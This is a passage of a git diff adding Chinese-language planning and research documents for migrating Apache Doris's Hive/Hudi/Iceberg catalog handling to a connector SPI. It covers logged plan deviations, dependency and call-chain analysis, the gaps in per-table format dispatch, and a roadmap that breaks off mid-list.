current+history + 每-split `THudiFileDesc.schema_id`)。批 A 不发任何 schema 元数据(保持现状名匹配,**零回归**),不 ship 裸 ConstNode 基线。用户已签字(2026-06-05,AskUserQuestion「Defer T03 to batch E」)。 +- **替代方案**:(a) 批 A 内建全套 field-id/InternalSchema/type→thrift 机制——否决(大、与批 E 重叠、触碰 live 可读 schema 路径、回归风险);(b) 裸 ConstNode 基线——否决(净回归大小写/缺列)。 +- **影响范围**: + - 文档:本条 + [tasks/P3](./tasks/P3-hudi-migration.md)(T03 移入批 E、备注现状名匹配 + evolution gap)+ [PROGRESS](./PROGRESS.md)(§三 parity 行 / §六计数)+ [connectors/hudi.md](./connectors/hudi.md)。 + - 代码:无(recon + 决策,零改动)。 + - 计划:批 A 范围由 {T02,T03,T04} 收为 {T02 ✅, T04};T03 与 T09–T11 同批 E。 +- **关联**:[DV-005](#dv-005--p3-hudi-的hms-over-spi-前置依赖与代码实际状态不符真正阻塞是-catalog-模型错配)(其后续 ① 本条修正)、P3-T03、P3-T10/T11(批 E)、[D-019](./decisions-log.md)(hybrid)、R-001 +- **后续动作**: + - [ ] 批 E:连接器 schema field-id + InternalSchema 版本 + type→thrift + `populateScanLevelParams` + per-split `schema_id`(faithful field-id evolution parity) + - [x] 现状行为登记:SPI hudi 走 BE 名匹配(`by_parquet_name`/`by_orc_name`),common 无 evolution 可用;改名 / reorder-with-evolution 退化(非崩溃) + +### DV-005 — P3 hudi 的「HMS-over-SPI 前置依赖」与代码实际状态不符;真正阻塞是 catalog 模型错配 + +- **发现日期**:2026-06-04 +- **发现 session / agent**:P3 启动 recon session(8-agent code-grounded workflow + 2 路对抗验证;verdict `hmsMetadataOverSpiReady=false`, high confidence) +- **当前状态**:🟡 待修正(P3 catalog 模型决策,待用户签字) +- **原计划位置**:[connectors/hudi.md](./connectors/hudi.md)(「P3 启动前必须 P5 paimon 或 P7 hive 进入到至少完成 hms metadata 路径」)、[master plan §3.4/§3.8](./00-connector-migration-master-plan.md)、决策 D-005(用 `tableFormatType` 区分 DLA) +- **偏差描述**:原计划假设 HMS-over-SPI 元数据读路径要等 P5/P7 才落地、是 P3 的前置硬依赖。recon 实测(`branch-catalog-spi` HEAD `0793f032662`)发现该读路径**代码早已存在且非 stub**(源自更早的 #62183/#62821,一直 dormant 在 gate 后): + - `fe-connector-hms` = 共享 **HMS Thrift 客户端库**(`HmsClient`/`ThriftHmsClient`,**不是** ConnectorMetadata); + - `fe-connector-hive` `HiveConnectorMetadata`(type `"hms"`) 真实读路径 + applyFilter 真分区裁剪; + - `fe-connector-hudi` `HudiConnectorMetadata`(type `"hudi"`) 从 Hudi Avro MetaClient 读 schema(HMS fallback)+ COW/MOR 探测 + `HudiScanPlanProvider` 快照扫描; + - D-005 区分符 `ConnectorTableSchema.tableFormatType`(`:33/:58`) 已存在并被各连接器写入。 + + 但全部 **dormant**:`CatalogFactory.SPI_READY_TYPES = {jdbc, es, trino-connector}`(`CatalogFactory.java:52`) 不含 hms/hudi → HMS 系 catalog 永远走 legacy `HMSExternalCatalog`(零 live caller)。**真正阻塞不是缺 HMS 读码,而是 catalog 模型错配**:现存连接器注册独立 `"hudi"` catalog type(`HudiConnectorProvider.getType()=="hudi"`),而 Doris 真实模型是 hudi 寄生在 `"hms"` catalog 内、以 `HMSExternalTable.DLAType.HUDI` 暴露;fe-core 无 `"hudi"` catalog type,且 `PluginDrivenExternalTable` 从不消费 `tableFormatType`(只读 `getColumns()`,按 catalog TYPE 字串路由)→ 单个 `"hms"` 连接器没有 per-table HUDI/HIVE/ICEBERG 分流的 SPI 机制。附带确认缺口:增量读无 SPI 表示(P1-T04 `visitPhysicalHudiScan` SPI 分支丢弃 `getIncrementalRelation()`;MVCC trio 未实现;4 个 `*IncrementalRelation` 仍在 fe-core);hive/hudi 未 override `listPartitions*`(Hudi applyFilter 列全部分区不裁剪,Hive applyFilter 做 EQ/IN 裁剪);三模块零测试。**已验证非阻塞**:SPI scan/split 通用链路(`PluginDrivenScanNode.planScan`→BE)已被合入的 trino-connector 走通;hudi-specific 的「单 ScanNode 混合 COW-native + MOR-JNI 每-split 格式」正确性才是待验证项。 +- **触发场景**:用户准备启动 P3,要求 code-grounded 确认 HMS 就绪情况。 +- **新方案**:P3 不再以「等 P5/P7 交付 HMS-over-SPI」为前提;改为 (1) recon SPI scan/split 路径(hudi-specific 正确性),(2) 写 catalog 模型决策备忘(见下),用户签字后再编码。**不要直接 flip `SPI_READY_TYPES`**。 +- **替代方案(catalog 模型,待用户决策)**: + - **(a) hms-first**:`HiveConnectorProvider(type="hms")` 接入 `PluginDrivenExternalCatalog` + fe-core 消费 `tableFormatType` 分流,hudi 作薄增量。一次命中真正架构阻塞、契合现存 `type="hms"` 设计;但把 P7(hive/HMS) 范围拉进 P3、触碰 live 重度使用的 HMS 路径、零测试网,回归风险大。 + - **(b) gate 后建脚手架**:先做 format-dispatch / 增量 SPI hook / MVCC + 补测试(design+stub,不动 live 路径、零回归);但 hudi 不单独端到端可用,推迟模型决策。 + - **(c) 直接 flip gate** —— **否决**(模型错配下 `"hudi"` provider 不可达;live hms catalog 推到未测 SPI;增量丢失;高回归)。 +- **影响范围**: + - 文档:本条 + [connectors/hudi.md](./connectors/hudi.md)(已加更正注)+ [PROGRESS.md](./PROGRESS.md)(§一 P3 / §二看板 / §四 / §六 / §七 已同步)+ [HANDOFF.md](./HANDOFF.md)(P3 起点)✅;master plan / hudi.md 章节正文待 P3 按选定模型重写。 + - 代码:无(recon only)。 + - 计划:P3 性质从「等依赖」变为「先定模型 + 补 SPI 分流/增量/测试」;可能与 P7(hive/HMS) 部分合并或重排序——待模型决策。 +- **关联**:D-005、P1-T04(incrementalRelation gap)、R-001(image 兼容)、P3、master plan §3.4/§3.8 +- **后续动作**: + - [x] P3 session:recon SPI scan/split —— **完成**(verdict:混合 COW-native/MOR-JNI 非问题、与 legacy 结构等价;plumbing 正确;parity gap 见下,详见 HANDOFF 1b) + - [ ] scan 侧 HIGH 修复(与模型无关、多在 SPI surface 内):①`HudiScanPlanProvider` override `populateScanLevelParams` 设 current_schema_id+history_schema_info + `HudiScanRange` 设 `THudiFileDesc.schema_id`;②column_types 改发完整 Hive 类型串(弃 `getTypeName()`)+ 停止逗号 join/split(typed list 端到端);③time-travel 透传 snapshot 否则 fail-loud;④增量读 fail-loud + - [x] 写 catalog 模型决策备忘(a/b),用户签字 —— **完成**:定 **hybrid**([D-019](./decisions-log.md)),建 [tasks/P3](./tasks/P3-hudi-migration.md)(批 A 现做 b、批 E 推迟 a) + - [ ] 选定后:补 `tableFormatType` 分流消费、增量 SPI hook、`listPartitions` override + 真实 applyFilter 裁剪、三模块测试 + ### DV-004 — T13 用户向安装文档不在本代码仓(在 doris-website 仓) - **发现日期**:2026-06-04 diff --git a/plan-doc/research/spi-multi-format-hms-catalog-analysis.md b/plan-doc/research/spi-multi-format-hms-catalog-analysis.md new file mode 100644 index 00000000000000..90765c76623f3a --- /dev/null +++ b/plan-doc/research/spi-multi-format-hms-catalog-analysis.md @@ -0,0 +1,349 @@ +# 独立调研:SPI 体系下「单 HMS catalog 同时访问 Hive / Iceberg / Hudi」的现状分析 + +> **性质**:独立调研快照(read-only),不修改任何现有文档。结论仅引用、不改写 [PROGRESS](../PROGRESS.md) / [tasks/P3](../tasks/P3-hudi-migration.md) / [DV-005](../deviations-log.md) / [D-019](../decisions-log.md)。 +> **方法**:6-reader code-grounded recon workflow(legacy-model / spi-catalog-gate / connector-providers / format-dispatch / scan-split-path / module-deps-reuse)+ 主线核读。所有结论带 `file:line` 锚点。 +> **调研日期**:2026-06-05 **分支**:`catalog-spi-04`(基于 `branch-catalog-spi`) +> **范围**:只回答「legacy 单 `hms` catalog 同时暴露 Hive+Iceberg+Hudi」这一能力在 SPI 体系下的现状、依赖、复用、调用关系、阶段、缺口、后续步骤。**未做任何代码改动。** + +--- + +## 0. TL;DR(一句话结论) + +**当前 SPI 体系「尚未」端到端支持单个 `hms` catalog 同时访问 Hive/Iceberg/Hudi。** 三件事已就位:①连接器模块齐全(hive 注册 `"hms"` 类型、hudi 注册 `"hudi"`、iceberg 注册 `"iceberg"`);②**per-table 格式探测已忠实复刻 legacy**(`HiveTableFormatDetector` 与 `HMSExternalTable.makeSureInitialized` 同序同集);③探测结果已写入 `HiveTableHandle.tableType` + `ConnectorTableSchema.tableFormatType`。 + +但**三处关键链路断裂**,使其仍不可用: + +1. **`tableFormatType` 产而不用**——fe-core `PluginDrivenExternalTable.initSchema()` 拿到 `ConnectorTableSchema` 后**只读 columns、从不读 `getTableFormatType()`**(`PluginDrivenExternalTable.java:~93`/`~210`),per-table 格式信号在 fe-core 边界被丢弃。 +2. **scan 派发按连接器硬编码、非按表格式**——`HiveScanPlanProvider.planScan` 对所有表都发 `HiveScanRange` 且 `tableFormatType="hive"`(`HiveScanRange.java:120-122,195`),**从不读 `handle.getTableType()`**;hms 里的 Hudi/Iceberg 表会被当成 Hive 误扫。 +3. **一个 `Connector` 只有一个 `ScanPlanProvider`(per-catalog 非 per-format)**——`Connector.getScanPlanProvider()` 默认返 null、`HiveConnector` 恒返 `HiveScanPlanProvider`;没有按 `HiveTableType` 选 `HudiScanPlanProvider`/`IcebergScanPlanProvider` 的 router。 + +加之 **gate 关闭**(`SPI_READY_TYPES={jdbc,es,trino-connector}`,不含 hms/hudi/iceberg,`CatalogFactory.java:52`),**整个 HMS 家族当前一律走 legacy `HMSExternalCatalog`**——SPI 路径是 dormant 的。 + +> 这与项目既有判断 [DV-005](../deviations-log.md)(真阻塞=catalog 模型错配 + fe-core 不消费 `tableFormatType`)、[D-019](../decisions-log.md)(hybrid:先硬化连接器、推迟模型落地到 P7/批 E)**完全吻合**——本调研在代码层面进一步坐实了"缺什么"。 + +--- + +## 1. Legacy 模型(目标行为:SPI 必须复刻它) + +单个 `HMSExternalCatalog`(type=`"hms"`)同时暴露 Hive/Iceberg/Hudi 表,靠**per-table 一次性格式探测 + 多态分派**: + +| 环节 | 位置 | 行为 | +|---|---|---| +| catalog | `HMSExternalCatalog.java:52-106` | 单实例,无 per-format 子类;所有表走 `HMSExternalTable` | +| 格式枚举 | `HMSExternalTable.java:208-210` | `DLAType { UNKNOWN, HIVE, HUDI, ICEBERG }` | +| **一次性探测** | `HMSExternalTable.java:250-307` | `makeSureInitialized()` 顺序:①Iceberg(`table_type=ICEBERG` 参数)→ ②Hudi(input format 或 `flink.connector=hudi`)→ ③Hive(支持的 input format);设 `dlaType` + 建多态 `dlaTable`(`IcebergDlaTable`/`HudiDlaTable`/`HiveDlaTable`)| +| schema 分派 | `HMSExternalTable.java:384-408` | `getFullSchema()` switch(dlaType):HUDI→`HudiDlaTable.getHudiSchemaCacheValue()`、ICEBERG→`IcebergUtils.getIcebergSchema()`、else→Hive | +| cache 引擎分派 | `HMSExternalTable.java:226-240` | `getMetaCacheEngine()` switch:`Hive/Hudi/IcebergExternalMetaCache.ENGINE` | +| **scan 分派** | `PhysicalPlanTranslator.java:~724-770` | `visitPhysicalFileScan` switch(`getDlaType()`):ICEBERG→`IcebergScanNode`、HIVE→`HiveScanNode`、HUDI→抛异常(须走 `visitPhysicalHudiScan`→`HudiScanNode`,`:819`)| +| 多态基类 | `HMSDlaTable.java:36-87` | 抽象基类定义 per-format 的 partition/snapshot/MTMV 操作;3 个实现 `Hive/Hudi/IcebergDlaTable` | + +**要点**:legacy 的"同时多格式"靠 **`DLAType` 这个 per-table tag + 处处 switch(dlaType)**。SPI 必须复刻这个 per-table tag 的产生 **与** 消费(switch)。当前**只复刻了产生,没复刻消费**(见 §4.3 / §6)。 + +--- + +## 2. 模块全景与依赖图 + +### 2.1 依赖图(已 code/pom 确认,箭头 = "依赖") + +``` + fe-thrift (provided) + ▲ + fe-connector-api ──────────────┐ (SPI 接口: Connector / ConnectorMetadata / + ▲ │ ConnectorTableSchema / handle / pushdown / scan) + fe-extension-spi │ + ▲ │ + fe-connector-spi ───────────────┤ (ConnectorProvider / ConnectorContext) + ▲ ▲ │ + ┌────────────────┘ └───────────┐ │ + fe-connector-hms fe-connector-iceberg │ + (共享 HMS Thrift 客户端库, (type="iceberg"; │ + 非 plugin: HmsClient / iceberg-core/-aws, │ + ThriftHmsClient / HmsTableInfo hadoop; **不依赖 hms, │ + / HmsPartitionInfo / 也不依赖 api!**) │ + HmsTypeMapping; + iceberg-api │ + hive-catalog-shade, + iceberg-backend- │ + hadoop, commons-pool2) {rest,hms,glue,dlf, │ + ▲ ▲ hadoop,s3tables} │ + │ │ │ +fe-connector- fe-connector- │ + hive hudi │ + (type="hms") (type="hudi"; │ + + hudi-common, │ + hudi-hadoop-mr) │ + │ │ │ │ + └───────────┴────────────┴──── 均依赖 fe-connector-api/-spi ┘ + + fe-core ── 仅依赖 ──> fe-connector-api + fe-connector-spi + (拥有 CatalogFactory / ConnectorFactory / ConnectorPluginManager / + PluginDrivenExternalCatalog·Database·Table / PluginDrivenScanNode) + **绝不依赖任何 fe-connector 实现模块**(hms/hive/hudi/iceberg/jdbc/es...) +``` + +### 2.2 依赖边清单(pom 实证) + +| 模块 | 依赖 | 锚点 | +|---|---|---| +| `fe-connector-api` | `fe-thrift`(provided) | `fe-connector-api/pom.xml:45-51` | +| `fe-connector-spi` | `fe-connector-api` + `fe-extension-spi` | `fe-connector-spi/pom.xml:42-52` | +| `fe-connector-hms` | `fe-connector-spi` + `hive-catalog-shade` + `hadoop-common` + `commons-pool2`(**库,非 plugin**)| `fe-connector-hms/pom.xml:43-96` | +| `fe-connector-hive` | `fe-connector-spi` + `fe-connector-api`(provided) + `fe-thrift`(provided) + **`fe-connector-hms`** | `fe-connector-hive/pom.xml:43-82` | +| `fe-connector-hudi` | `fe-connector-spi` + `fe-connector-api`(provided) + `fe-thrift`(provided) + **`fe-connector-hms`** + `hudi-common` + `hudi-hadoop-mr` | `fe-connector-hudi/pom.xml:44-96` | +| `fe-connector-iceberg` | `fe-connector-spi` + `iceberg-core` + `iceberg-aws` + `hadoop-common`(**无 hms,且 pom 未见 api**)| `fe-connector-iceberg/pom.xml:43-81` | +| `fe-core` | `fe-connector-api` + `fe-connector-spi`(仅此)| 由 import-gate 保证 | + +**关键结构观察**: +- **依赖脊柱**:`api ← spi ← hms ← {hive, hudi}`;`iceberg` 走另一条线(Iceberg SDK,**不复用 hms**)。 +- **Hudi 不依赖 Hive**(pom 确认)——这印证了 P3-T05 里"分区裁剪 helper 只能从 Hive 复刻、不能跨模块共享"的判断。 +- **单向隔离**:`tools/check-connector-imports.sh:30-60` 禁止连接器 import fe-core `{catalog,common,datasource,qe,analysis,nereids,planner}`;fe-core 只 import `connector.api.*`/`connector.spi.*`。这是整个 SPI 解耦的护栏。 + +### 2.3 各连接器完成度(LOC / 阶段,recon 实测) + +| 连接器 | LOC / 类数 | 注册 type | 实现范围 | 缺 | +|---|---|---|---|---| +| **fe-connector-hms** | 1461 / 9 | —(共享库)| HMS Thrift 客户端 + 类型映射 | n/a | +| **fe-connector-hive** | 2010 / 12 | `"hms"` | metadata + scan + 分区裁剪 + **格式探测** | 非-Hive 格式的 scan 派发 | +| **fe-connector-hudi** | 1854 / 11 | `"hudi"` | metadata + COW/MOR scan(T02/T04/T05 已硬化)| 接入 `hms` catalog 的 per-table 路径;MVCC/增量(批 E) | +| **fe-connector-iceberg** | 596 / 6 | `"iceberg"` | **metadata-only**(list/getTableHandle/getTableSchema,用 Iceberg SDK)| **无 `ScanPlanProvider`**;pom 未依赖 `fe-connector-api` | + +--- + +## 3. SPI 接口契约 & 调用关系(call chains) + +### 3.1 关键 SPI 类型 + +- `Connector`(`fe-connector-api/Connector.java:34-121`):`getMetadata(session)` + `getScanPlanProvider()`(默认返 null,`:40-42`,**per-catalog 一个**)。 +- `ConnectorMetadata`(`ConnectorMetadata.java:37-44`)= `ConnectorSchemaOps + ConnectorTableOps + ConnectorPushdownOps + ConnectorStatisticsOps + ConnectorWriteOps + ConnectorIdentifierOps + Closeable`。 +- `ConnectorProvider`(`fe-connector-spi/.../ConnectorProvider.java:40-98`):`getType()` / `supports(type,props)`(默认 `type.equalsIgnoreCase(getType())`)/ `create(props,ctx)` / `apiVersion()`。 +- `ConnectorTableSchema`(`fe-connector-api/.../ConnectorTableSchema.java:29-92`):`tableName + columns + **tableFormatType(String)** + properties`。**承载 per-table 格式信号的载体**。 +- `ConnectorScanPlanProvider`(`.../scan/ConnectorScanPlanProvider.java:38-196`):`planScan(session, handle, columns, filter, limit) → List`。 +- `ConnectorScanRange.getTableFormatType()`(`.../scan/ConnectorScanRange.java:96-98`):默认 `"plugin_driven"`,各连接器 override(Hive→`"hive"`、Hudi→`"hudi"`)。 + +### 3.2 catalog 创建链路 + +``` +CREATE CATALOG + → CatalogFactory.createCatalog() (CatalogFactory.java:71-184) + → if (SPI_READY_TYPES.contains(type)) // 当前仅 jdbc/es/trino-connector + ConnectorFactory.createConnector(type, props, ctx) + → ConnectorPluginManager.createConnector() (:126-144) + → 遍历 providers, 第一个 provider.supports(type,props)==true + → provider.create(props, ctx) → Connector + → new PluginDrivenExternalCatalog(..., connector) + else // hms/iceberg/paimon/hudi/max_compute 走这里 + new HMSExternalCatalog(...) / IcebergExternalCatalogFactory.createCatalog(...) ... ← legacy + → (FE 重启/反序列化) PluginDrivenExternalCatalog.initLocalObjectsImpl() (:87-145) + → 用带 auth 的 DefaultConnectorContext 重新 createConnector(连接器生命周期 = 2 次创建) +``` + +### 3.3 元数据 / schema 链路(per-table 格式在此"产生") + +``` +PluginDrivenExternalTable.initSchema() (PluginDrivenExternalTable.java:79-109) + → metadata.getTableHandle(session, db, tbl) + → [Hive] HiveConnectorMetadata.getTableHandle() (:105-131) + → HiveTableFormatDetector.detect(HmsTableInfo) (:77-100) ← 产生 HiveTableType{HIVE|HUDI|ICEBERG|UNKNOWN} + → new HiveTableHandle(..., tableType) ← 格式写入 handle + → metadata.getTableSchema(handle) + → [Hive] HiveConnectorMetadata.getTableSchema() (:134-154) + → detectFormatType(tableInfo) (:282-294) ← 产生 tableFormatType 字符串("HIVE_*"/"HUDI"/"ICEBERG") + → return new ConnectorTableSchema(name, cols, **formatType**, props) + → ❗ initSchema 只迭代 tableSchema.getColumns(),**从不读 getTableFormatType()** ← 信号在此丢弃(见 §6 缺口①) +``` + +### 3.4 scan / split 链路(per-table 格式在此"本应被消费"却未) + +``` +PhysicalPlanTranslator.visitPhysicalFileScan() (:~735-740) + → if (table instanceof PluginDrivenExternalTable) → PluginDrivenScanNode // 先于 HMSExternalTable 匹配 +PluginDrivenScanNode.getSplits() (:356-378) + → connector.getScanPlanProvider() // per-catalog 一个;Hive 恒返 HiveScanPlanProvider + → scanProvider.planScan(session, currentHandle, cols, filter, limit) + → [Hive] HiveScanPlanProvider.planScan() (:95-132) + → resolvePartitions(handle) → listAndSplitFiles(...) + → 每 split: HiveScanRange{ ..., tableFormatType="hive" } (:268-296) ← ❗ 不读 handle.getTableType() + → [Hudi] HudiScanPlanProvider.planScan() (:85-162) // 但 hms catalog 不会路由到它 + → HoodieTableMetaClient → resolvePartitions → COW/MOR split → HudiScanRange{tableFormatType="hudi"} + → PluginDrivenScanNode.setScanParams() (:381-395) + → TTableFormatFileDesc.setTableFormatType(scanRange.getTableFormatType()) ← BE 按此 string 选 reader +``` + +> **断点可视化**:格式信号有两条独立通道——(1) `ConnectorTableSchema.tableFormatType`(metadata 阶段产生,**fe-core 不消费**);(2) `ConnectorScanRange.getTableFormatType()`(scan 阶段产生,**被消费但 per-connector 硬编码**)。两条都无法让"一个 hms catalog 把某张表当 Hudi/Iceberg 扫"。 + +--- + +## 4. per-table 格式探测:已就位的部分 + +SPI 侧 `HiveTableFormatDetector.detect(HmsTableInfo)`(`fe-connector-hive/.../HiveTableFormatDetector.java:77-100`)**逐条镜像** legacy `HMSExternalTable.supportedIcebergTable/supportedHoodieTable/supportedHiveTable`: + +``` +(1) params["table_type"] == "ICEBERG" → ICEBERG +(2) params["flink.connector"] == "hudi" + || inputFormat ∈ {HoodieParquetInputFormat, HoodieParquetRealtimeInputFormat, ...} → HUDI +(3) inputFormat ∈ {MapredParquetInputFormat, OrcInputFormat, TextInputFormat, ...} → HIVE +(4) else → UNKNOWN +``` + +- 同序、同集,与 fe-core 检测**不漂移**(两套各一份,recon 已比对一致;潜在 drift 风险见 §8)。 +- 结果落两处:`HiveTableHandle.tableType`(handle,`HiveTableHandle.java:~41`)+ `ConnectorTableSchema.tableFormatType`(schema,`HiveConnectorMetadata.java:153`)。 + +**所以"探测"这一步已具备 legacy 的全部能力**——问题在下游"消费/路由"。 + +--- + +## 5. 复用地图(哪些可复用) + +| 可复用资产 | 位置 | 谁在用 / 可被谁用 | +|---|---|---| +| **HMS Thrift 客户端**(`HmsClient`/`ThriftHmsClient`,池化)| `fe-connector-hms` | hive + hudi 已复用;iceberg-HMS-backend **未**复用(用 Iceberg SDK)| +| `HmsTableInfo` / `HmsPartitionInfo` DTO | `fe-connector-hms` | hive + hudi | +| `HmsTypeMapping`(HMS→ConnectorType)| `fe-connector-hms` | hive + hudi | +| **`HiveTableFormatDetector`**(per-table 格式探测)| `fe-connector-hive` | 仅 hive 内部;**应抽到共享层**供 router 复用 | +| `ConnectorScanRange.populateRangeParams()` 钩子 | `fe-connector-api` | 各连接器写 per-split BE thrift(Hive ACID、Hudi JNI)| +| **`PluginDrivenScanNode`** 通用 split/pushdown/limit/projection | `fe-core` | 任何新 provider 插入 `getScanPlanProvider()` 即免费获得 | +| `ConnectorMetadata.applyFilter()` 下推钩子 | `fe-connector-api` | Hive/Hudi 分区裁剪;Iceberg/Hudi 可 override 加格式特定下推 | +| 分区裁剪 helper(extractPartitionPredicates 等)| hive ↔ hudi **重复**(P3-T05 登记)| 待 P7 consolidate | +| `ConnectorFactory.createConnector()` null-fallback | `fe-core` | legacy↔SPI 共存的 feature-flag(`SPI_READY_TYPES`)| + +--- + +## 6. 关键缺口(为什么还不能端到端) + +> 按"阻断性"排序。①②③是机制断点,④⑤是模块缺失,⑥是开关。 + +**① `tableFormatType` 产而不用(keystone gap)** +`HiveConnectorMetadata` 正确地 per-table 设置了 `ConnectorTableSchema.tableFormatType`,但 `PluginDrivenExternalTable.initSchema()`(`:79-109`)**只读 columns、从不读 `getTableFormatType()`**。legacy 的 `DLAType` tag 在 SPI 里有"产生"无"消费"。→ fe-core 无从得知一张 SPI 表是 Hive/Hudi/Iceberg,也就无法把它路由到对的 scan/cache 路径。 + +**② scan 派发 per-connector 硬编码、非 per-table** +`HiveScanPlanProvider.planScan` 对所有表恒发 `tableFormatType="hive"`(`HiveScanRange.java:120-122,195`),**从不读 `handle.getTableType()`**(`HiveScanPlanProvider` 取 inputFormat/serde 但不分支格式)。→ hms 里的 Hudi/Iceberg 表会被 BE 当 Hive 文件误扫。 + +**③ 一个 `Connector` 只有一个 `ScanPlanProvider`** +`Connector.getScanPlanProvider()` 是 per-catalog(`Connector.java:40`),`HiveConnector` 恒返 `HiveScanPlanProvider`(`HiveConnector.java:60-62`)。没有"按 `HiveTableType` 选 `HudiScanPlanProvider`/`IcebergScanPlanProvider`"的 router/strategy。 + +**④ Iceberg SPI 仅 metadata、无 scan provider** +`IcebergConnectorMetadata` 仅 167 LOC(list/getTableHandle/getTableSchema,用 Iceberg SDK);`IcebergConnector` **无 `getScanPlanProvider()` override → 返 null**(`IcebergConnector.java`,scan 仍在 fe-core `IcebergScanNode`)。且 `fe-connector-iceberg` pom **未依赖 `fe-connector-api`**(仅 spi),是接入 scan SPI 前必须补的结构缺口。 + +**⑤ Hudi 的 metadata/scan 未接入 `hms` catalog 的 per-table 路径** +`HudiConnectorProvider` 注册的是**独立** `"hudi"` 类型(面向专用 Hudi catalog),不在 `hms` catalog 的 per-table 分派内。hms 里探测为 HUDI 的表,目前 SPI 无法把它交给 `HudiConnectorMetadata`/`HudiScanPlanProvider`。 + +**⑥ gate 关闭** +`SPI_READY_TYPES={jdbc,es,trino-connector}`(`CatalogFactory.java:52`)不含 hms/hudi/iceberg → 整个 HMS 家族走 legacy `HMSExternalCatalog`。即便①–⑤补齐,也需翻闸 + legacy 兼容/cutover + image 反序列化兼容(R-001)。 + +**附:测试缺口** 多格式分派零测试(`HMSExternalTableTest` 仅测 view);三连接器模块 parity 测试为 P3 批 C 待补项。 + +--- + +## 7. 当前阶段定位 + +> 引用 [PROGRESS.md](../PROGRESS.md)(不改写): + +- **P0 SPI 基座 ✅ / P1 scan-node 收口 ✅ / P2 trino-connector ✅**(已合入 `branch-catalog-spi`)。 +- **P3 hudi(hybrid,D-019)进行中**:批 A(T02 column_types、T04 time-travel/增量 fail-loud)+ 批 B(T05 分区裁剪、T06 MVCC keep-defaults)**编码完成**,**gate 仍关**;批 C(三模块测试 + COW/MOR parity)、批 D(T08 `tableFormatType` 分流消费**设计**)待启动;批 E(模型落地/翻闸/删 legacy/集群验证)deferred 并入 P7。 +- **P4 maxcompute / P5 paimon / P6 iceberg / P7 hive(+HMS) / P8 收尾**:未启动。 +- **Iceberg / Hive 连接器**:iceberg=metadata-only(596 LOC),hive=metadata+scan+探测(2010 LOC),**均 dormant**(gate 关)。 +- **真阻塞([DV-005](../deviations-log.md))= catalog 模型错配 + fe-core 不消费 `tableFormatType`**——本调研在 §6 逐条坐实。 + +**一句话定位**:底座(SPI 接口、PluginDriven* 框架、HMS 共享库、per-table 探测、各连接器骨架)已就位且各连接器在 gate 后逐个硬化;**但"单 hms catalog 多格式分派"这条主干尚未接通,且其设计(批 D / T08)尚未落笔、落地在 P7/批 E**。 + +--- + +## 8. 还缺哪些模块 / 机制 + +| # | 缺失项 | 类型 | 落点(项目计划)| +|---|---|---|---| +| M1 | **fe-core 消费 `tableFormatType`**:`PluginDrivenExternalTable`(或一个 table 工厂)读 `ConnectorTableSchema.tableFormatType`,驱动 per-table 的 scan 路径 + cache 引擎选择 | fe-core 机制 | **批 D 设计(T08) → 批 E/P7 实现** | +| M2 | **per-table scan-provider router**:让单个 `hms` 连接器按 `HiveTableType` 选 Hive/Hudi/Iceberg 的 scan 规划(见下"3 选项")| SPI/连接器机制 | 批 D 设计 → P7 | +| M3 | **`IcebergScanPlanProvider`** + `fe-connector-iceberg` 依赖 `fe-connector-api` | iceberg 模块 | **P6** | +| M4 | **Hudi metadata/scan 接入 hms catalog**(hms 探测为 HUDI 的表交给 Hudi 路径)| 连接器组合 | 批 E/P7 | +| M5 | **格式探测共享化**:把 `HiveTableFormatDetector` 抽到共享层,消除 fe-core / SPI 两份 drift 风险 | 复用重构 | P7 | +| M6 | **gate flip** `SPI_READY_TYPES += hms` + legacy `HMSExternalCatalog` cutover/兼容 + image 反序列化兼容(R-001)| 翻闸/迁移 | 批 E/P7 | +| M7 | **多格式分派测试网**(parity:SPI 输出 vs legacy;混合 Hive/Hudi/Iceberg catalog 端到端)| 测试 | P3 批 C + P7 | +| M8 | Paimon / MaxCompute 的 ConnectorProvider(与本问题相关性低,但同属 HMS 家族外的并行迁移)| 连接器 | P4 / P5 | + +### M2 的关键未决设计决策("3 选项",recon 浮现,**项目尚未拍板**) + +单个 `hms` catalog 如何把 per-table 路由到 Hive/Hudi/Iceberg?三条路线(互斥): + +- **(A) 连接器内 router**:`HiveConnector`(type=`"hms"`)作为网关,`getScanPlanProvider()` 返回一个按 `handle.getTableType()` 选子 provider 的 router;metadata 侧同理 `HiveConnectorMetadata` 委托 `Hudi/IcebergConnectorMetadata`。**优点**:贴合"hive 模块已注册 `hms`"现状、单 catalog 单 connector 不变。**缺点**:把 hive 连接器变成三格式聚合体,模块边界变重。 +- **(B) SPI 改为 per-table 选 provider**:把 `getScanPlanProvider()` 从 `Connector`(per-catalog)下移到 `ConnectorMetadata.getScanPlanProvider(handle)`(per-table,按 handle 类型)。**优点**:最干净的 per-table 语义。**缺点**:改 SPI 接口,影响所有连接器。 +- **(C) fe-core 发现期分派**:fe-core 读 `tableFormatType`,在建表时产出 format-specific 的表对象(最接近 legacy `DLAType`→多态 `DlaTable`)。**优点**:与 legacy 心智一致、改动集中在 fe-core。**缺点**:fe-core 需重新长出 per-format 分派(部分回到 legacy 形态),与"瘦 fe-core"目标张力。 + +> 这正是 [D-019](../decisions-log.md) 把 (a)模型落地推迟到 P7/批 E 的核心待决项;[tasks/P3 T08](../tasks/P3-hudi-migration.md)(批 D,design-only)是其设计入口。本调研建议把"M1+M2 的 (A/B/C) 选型"作为 T08 设计备忘的核心命题。 + +--- + +## 9. 后续开发步骤(建议 roadmap) + +> 与既有阶段计划(P3 hybrid → P6 iceberg → P7 hive/HMS)和 D-019/DV-005 对齐;不替代项目计划,作为"打通单 hms 多格式"的依赖序梳理。 + +``` +[已完成] SPI 基座(P0) · scan-node 收口(P1) · trino 迁移(P2) · hudi 连接器硬化(P3 批A+B) + │ + ├─[P3 批C] 三模块测试基线 + COW/MOR parity(SPI 输出 vs legacy) ← 正在路上 + │ + ├─[P3 批D / T08] ★keystone 设计★:`tableFormatType` 分流消费 + M2(A/B/C)选型 ← 设计 only + │ 产出 D-NNN(模型决策),明确 M1+M2 的接口形态 + │ + ├─[P6] Iceberg scan SPI:补 IcebergScanPlanProvider + iceberg 依赖 api(M3) ← 让 iceberg 可走 SPI + │ + └─[P7 / 批E] 模型落地(live cutover): + 1. M1 fe-core 消费 tableFormatType(PluginDrivenExternalTable / table 工厂) + 2. M2 落地选定的 router 方案(A/B/C 之一) + 3. M4 hms catalog 内 per-table 把 HUDI→Hudi 路径、ICEBERG→Iceberg 路径 + 4. M5 抽共享格式探测,消 drift + 5. M6 SPI_READY_TYPES += hms 翻闸 + legacy HMSExternalCatalog cutover + image 兼容(R-001) + 6. 删 legacy datasource/{hive,hudi,iceberg}/ + 清反向 instanceof + 7. M7 混合 Hive/Hudi/Iceberg 